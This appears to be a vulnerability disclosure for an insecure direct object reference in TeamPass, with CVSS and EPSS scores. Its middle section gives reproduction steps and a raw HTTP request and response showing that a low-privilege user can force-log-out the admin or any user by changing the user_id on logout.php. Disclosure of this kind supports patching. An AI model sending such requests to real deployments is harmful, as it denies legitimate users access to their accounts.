5.4 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
LOW
Availability Impact
LOW
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L
5.5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:S/C:N/I:P/A:P
0.0004 Low
EPSS
Percentile
11.4%
IDOR vulnerability allow low level user to log out everyone in the system by changing the user ID.
Step 1: Login in as admin
Step 2: Go to user and add an user. Set role to Default.
Step 3: Login as the new user.
Step 4: Logout the user
GET /teampass/includes/core/logout.php?user_id=10000001 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Referer: http://localhost/teampass/index.php?page=items
Cookie: 4a5b833fa554df2e84c76e5cd45ce14cd307ceebac65bd2722=569d0d699362872a0cb318b102a9c98e6e36a30f11823ec5a1; teampass_session=r511n6jfa0dqvm7jpjcipmdc1a; jstree_select=2
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Change the user_id to any other id. For this example, we use 1 as admin user_id
Below is the response of the request submitted at above.
HTTP/1.1 200 OK
Date: Tue, 28 Feb 2023 07:25:00 GMT
Server: Apache/2.4.54 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 526
Connection: close
Content-Type: text/html; charset=utf-8
<script type="text/javascript" src="../../plugins/store.js/dist/store.everything.min.js"></script>
<script language="javascript" type="text/javascript">
</script>
Step 5: Admin has logged out
5.4 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
LOW
Availability Impact
LOW
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L
5.5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:S/C:N/I:P/A:P
0.0004 Low
EPSS
Percentile
11.4%